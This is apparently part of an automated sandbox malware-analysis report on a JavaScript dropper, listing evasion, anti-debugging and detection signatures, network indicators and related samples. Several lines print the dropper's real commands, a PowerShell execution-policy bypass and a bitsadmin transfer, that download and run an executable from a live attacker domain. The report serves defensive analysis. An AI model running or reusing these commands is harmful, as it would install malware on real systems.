Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5726Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1220Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep count: 5726 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep count: 1220 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1148Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep count: 107 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 272Thread sleep time: -922337203685477s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: powershell.exe, 00000009.00000002.4671583242.0000000004C02000.00000004.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000009.00000002.4671583242.0000000004C02000.00000004.sdmpBinary or memory string: Xk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000009.00000003.4640141186.0000000006CEE000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\SysWOW64\wscript.exeSystem information queried: KernelDebuggerInformationJump to behavior
Enables debug privilegesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmpBinary or memory string: Program Manager
Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmpBinary or memory string: Progman
Source: bitsadmin.exe, 00000007.00000002.5552995211.0000000003850000.00000002.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 102817 Sample: 11Love_You_2019_35210544-txt.js Startdate: 11/01/2019 Architecture: WINDOWS Score: 76 29 JavaScript source code contains functionality to generate code involving HTTP requests or file downloads 2->29 31 JavaScript source code contains functionality to generate code involving a shell, file or stream 2->31 33 Suspicious powershell command line found 2->33 35 4 other signatures 2->35 7 wscript.exe 1 2->7         started        process3 signatures4 37 Wscript starts Powershell (via cmd or directly) 7->37 39 Tries to download files via bitsadmin 7->39 10 cmd.exe 1 7->10         started        13 cmd.exe 1 7->13         started        process5 signatures6 41 Suspicious powershell command line found 10->41 43 Wscript starts Powershell (via cmd or directly) 10->43 45 Powershell starts a process from the temp directory 10->45 47 Tries to download and execute files (via powershell) 10->47 15 powershell.exe 15 21 10->15         started        19 conhost.exe 10->19         started        49 Tries to download files via bitsadmin 13->49 21 conhost.exe 13->21         started        23 bitsadmin.exe 1 13->23         started        process7 dnsIp8 25 slpsrgpsrhojifdij.ru 92.63.197.48, 80 ITDELUXE-ASRU Russian Federation 15->25 27 Powershell connects to network 15->27 signatures9

Simulations

Behavior and APIs

TimeTypeDescription
20:06:52API Interceptor51x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.microsoft.coU0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
92.63.197.48Love_You_2018_24451856.js236aa97f9cc30157f5b24fa2907a61a42971e778342063e5610ea0fdb1a50190maliciousBrowse
  • 92.63.197.48/ccc.exe?eDIkHV
5Love_You_2018_32702800.js8a3a9d638a4eeae6dc3cac193c29eddb6ceb90e8dde07bf89203ebedd4926e2cmaliciousBrowse
  • 92.63.197.48/m/s.exe
9Love_You_2018_7425872.js46f8031ebb989c676d360e3d9c1acc489eed5e6d59bdb69095df5810c031f596maliciousBrowse
  • 92.63.197.48/m/s.exe
17Love_You_2018_34926152.js38937923e5d030cb9c7615b7424c3db32e390c5f7582e8fb753272b5b1c5c184maliciousBrowse
  • 92.63.197.48/m/s.exe
3Love_You_2018_8934576.jsb89560cea37849b4d0bd36b3f642db2af3ddcbcd971cf9770c50939fe7a3e8c4maliciousBrowse
  • 92.63.197.48/m/s.exe
7Love_You_2018_21114824.js17e8eeeaae6d82dbbdaa91b88d57d55ac1cc165f77e54075aac84a0ef20097b1maliciousBrowse
  • 92.63.197.48/m/s.exe
1Love_You_2018_35122760.jsc8773c6170b1db92311bda71852f8002ce3240a1aba8f3119cd8d2906f316b3cmaliciousBrowse
  • 92.63.197.48/m/s.exe
3Love_You_2018_10696040.js78daf82c9c74396d354532f244a46ef6e5634b33a27b0ceac965a3855ba37f1dmaliciousBrowse
  • 92.63.197.48/m/s.exe
25Love_You_2018_5622296.js2036af16a6c839d905718e9d6bbfb8b62f33ff7226bdf7e8e883a475f92b3e4bmaliciousBrowse
  • 92.63.197.48/m/s.exe
7Love_You_2018_25044720.jsc0f7906a15850379f883f38ce77d2b00a449292db687799391ac73dc6e9a48efmaliciousBrowse
  • 92.63.197.48/m/s.exe
15Love_You_2018_2924568.js343691d972177727fbcbca66cbe61df7b2b8ec9cc46b04620ed28a5a3dce3f79maliciousBrowse
  • 92.63.197.48/m/s.exe
7Love_You_2018_26025864.js092613677642edeeef8e21a7adc48ac334f7e0bee28e8629a71787a6b646f191maliciousBrowse
  • 92.63.197.48/m/o.exe
3Love_You_2018_23335624.jsc59640a685feaf3981ec41fb6ca6f3896b2aab201edea5a5bc4207ac18d96109maliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
7Love_You_2018_7970952.js53bcb1b4aa7be88161bee9fd980b1b91119ef422d6fc12e5280a6756d9d55078maliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
24Love_You_2018_31235648.jsa92be60a1153ee78d0fd60f73b8a91091063e239b34dbb89962d5a3e6763640bmaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
9Love_You_2018_3081616.jsd054c07414923261897859449780d9d7215ccc852502cbc3c515a1744b6bb2bamaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?IGrq
17Love_You_2018_434386536.js7a73fe8dc6d56993538c5cbc12631c0db6ef93709d54de84ce81cdd1cf54dc2emaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
19Love_You_2018_146713728.js45f9afb26bba97a5b0f95619c4a268855a66a3499f8f795cb63fd2f707631547maliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?ksetN
19Love_You_2018_2660864.js797567cf74aa53328db8448be3a86b4991fc1ccb18a358ff7148042f4a9a73camaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?IGrq
13Love_You_2018_35724840.js78f1d0d2840ff738d712cf94e0e0f22aa38acddafc2ed00ac6e50005875cc11amaliciousBrowse
  • ssofhoseuegsgrfnu.ru/hello.exe?IGrq

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
slpsrgpsrhojifdij.ru1Love_You_23798904-2019-txt.js0b3084dd10925e607506e575319e5b5c833de81907f0023b5b546e06da829e3cmaliciousBrowse
  • 92.63.197.48
13Love_You_36092368-2019-txt.jsdbc7fb518d127d1d7ebb008035dca1e871cbee5c1851814c0d8c0fe2ddbecabcmaliciousBrowse
  • 92.63.197.48
19Love_You_33243264-2019-txt.js2dc0fcac81c2c39c7b6c1a94c8788978bc9ebb1027c9cc146e7701c380407b99maliciousBrowse
  • 92.63.197.48
17Love_You_32243160-2019-txt.js676a4a1cd1294ac2e957ea124195b20cb2df16ad7f518013284f6e17d381a5bcmaliciousBrowse
  • 92.63.197.48
28Love_You_14132720-2019-txt.js9634b88629d5c86f10127571ca76fc1b52a690271837f6f0cd8d72c261da1881maliciousBrowse
  • 92.63.197.48
17Love_You_32243160-2019-txt.js676a4a1cd1294ac2e957ea124195b20cb2df16ad7f518013284f6e17d381a5bcmaliciousBrowse
  • 92.63.197.48
5Love_You_24522872-2019-txt.js62b8c92184ff9c77befd205c19fd0b2a80e730f0553eb8bc1d7ef1cf6f2a2c65maliciousBrowse
  • 92.63.197.48
9Love_You_34685376-2019-txt.js31816bec6de915b7d4cf8bb782a5b4415b825d9be23569618746307fa0922e5cmaliciousBrowse
  • 92.63.197.48
13Love_You_4407632-2019-txt.jsdab0ad1488b82a9468606f2b7d962732808af00baaf2fa0a5b8bfdc00b17d00bmaliciousBrowse
  • 92.63.197.48
7Love_You_24445728-2019-txt.js169b67306c7d13739a9408a416180cee705adc9dec515eb2a58f4227b8bf77e8maliciousBrowse
  • 92.63.197.48
3Love_You_30999304-2019-txt.js3efbfac8cec1a19eb01058641af3cfeb6e294edf4629efc0a624a77093364297maliciousBrowse
  • 92.63.197.48
1Love_You_4038752-2019-txt.js315fb2c7976b523d7cdf6bf2568a8f8f46d63b12e4858fe3aaa06602969f44bbmaliciousBrowse
  • 92.63.197.48
35Love_You_35003568-2019-txt.js6765a93d9c2c84876ef1be94f0398cbd7a05d98362f3a603d9fc51dc76b565ffmaliciousBrowse
  • 92.63.197.48
3Love_You_22152168-2019-txt.js7936b5811989ca7a3972f12bc1c9a3ca1295c34b43c7fbb0157a09fe69342129maliciousBrowse
  • 92.63.197.48
3Love_You_5480552-2019-txt.js456d0173f1122755322c4239fa7673c54fcf9b0ec185d336721c57b0683c1152maliciousBrowse
  • 92.63.197.48
1Love_You_20589904-2019-txt.js42ac22486df6721490650fdba21d58c4a8355ce8f128c2d6b03a6ecbcb4ad761maliciousBrowse
  • 92.63.197.48
1Love_You_25820280-2019-txt.js7efc81eff9874e9b245f75790c624830dae947c90bdf14a8b888d4c6030b7d27maliciousBrowse
  • 92.63.197.48
7Love_You_37480864-2019-txt.jsb8269f93ab46995752ddb315b829eaaf69f9bcd776e614390e88679d4b415153maliciousBrowse
  • 92.63.197.48
7Love_You_21032224-2019-txt.js2e1e449400cdd9085cf94dd2c8e8b7decf43d58a9d51a0057f2fc70eeaebdc71maliciousBrowse
  • 92.63.197.48
29Love_You_2019_22491400-txt.js8de5adb8364fec6b7ae94f87f6f61f1a5e120c2a7977ddf2ec68c2f8b134da34maliciousBrowse
  • 92.63.197.48

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
ITDELUXE-ASRU13DOC1065095022-PDF.jsadb2f4cb2cd132158a627695d6f3be576bf0062e9d85cc5b458e5cd380fdb2bcmaliciousBrowse
  • 92.63.197.38
3DOC2334611999-PDF.jsb99c026488f28029cf2e8bf61b6eb6e38d9e893a54495ff502d790de3f2c6d40maliciousBrowse
  • 92.63.197.38
41DOC1175989025-PDF.jse80df4c5fe933fca69591d1975a137a51553d5da303c08dfc3a447ecc7a33780maliciousBrowse
  • 92.63.197.38
25DOC8591492391-PDF.js77f974f88a3745da44160d5723a0e51ec2f7136723d3a6c04e8508f6f9a2aaecmaliciousBrowse
  • 92.63.197.59
3DOC2205210520-PDF.jsb400da34f16db0003ce2c83456309f6c1994981771f775a582be11e18117e204maliciousBrowse
  • 92.63.197.59
4220186616_661649.jpg.jsf0e108407264be22bfab325b8cf396fa55daffc408e55485eee3aefba6a4f4d6maliciousBrowse
  • 92.63.197.60
1220186641_664114.jpg.js84a9f144978a7e32095df53271572187467361e93d225ea20c598238cb3c4822maliciousBrowse
  • 92.63.197.60
5720186070_607041.jpg.js948e8cca34a663d01330f3f43049bf48a98f7a4256309fba5721a5b84e61fc1cmaliciousBrowse
  • 92.63.197.60
4320188311_831151.jpg.jsf03f03c89b1e9b92d56c70301364ff432bb5eb2090e3d5594a22fd7c14c697a2maliciousBrowse
  • 92.63.197.60
820186230_623023.jpg.js2f35d861b035723e947404d0ca322f587b7c621b9268434fe8e664daeff286c6maliciousBrowse
  • 92.63.197.60
3620183610_361025.jpg.jscec591843a45daa24c785f09425cd7fd7b171900b2e553fdca2abe5303f89cbamaliciousBrowse
  • 92.63.197.60
4920182341_234146.jpg.jsf3c89f9187c08d195a53d90176f14e469bf65f257815eb273d8211b2458bf8bcmaliciousBrowse
  • 92.63.197.60
1520182903_290342.jpg.jsee7d2971674afc7c547c6e9b896e0488d947da7714b32d53a8bd07140e4f35fcmaliciousBrowse
  • 92.63.197.60
420185977_597762.jpg.js82340710920e31f33039438dca4be5752d2944361d10e919223638dba4de6237maliciousBrowse
  • 92.63.197.60
3520182561_256167.jpg.jsefe52932831967e90d6c53e939c9afbffb8468bb1c5c168691a8e80baf0ef796maliciousBrowse
  • 92.63.197.60
1820183840_384094.jpg.jse9031266ddc9e1e3e169d413a26b4be53bdbaf3329e7d3718019a08b03579bc3maliciousBrowse
  • 92.63.197.60
1020189484_948400.jpg.js08b933aa7a106c4769fe6c817bbfe0c83d54f4ebf3f5a38ed8cfcfac90cd2b66maliciousBrowse
  • 92.63.197.60
5720181654_165464.jpg.jsc0f54a8f0e116e8297ab9695db386a1c09f2a67aa0d49cbd0512cddb13e33101maliciousBrowse
  • 92.63.197.60
1220185723_572394.jpg.jsaeedae6b4791657f3b2d7ff5fa1395655d5682d27af81ff63025d1f08fe388b3maliciousBrowse
  • 92.63.197.60
520185892_589245.jpg.jsf822a799f60e9d2cf154a7906e5bc117c172fa061edf28cd6f6f5a1c9331f5d7maliciousBrowse
  • 92.63.197.60

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.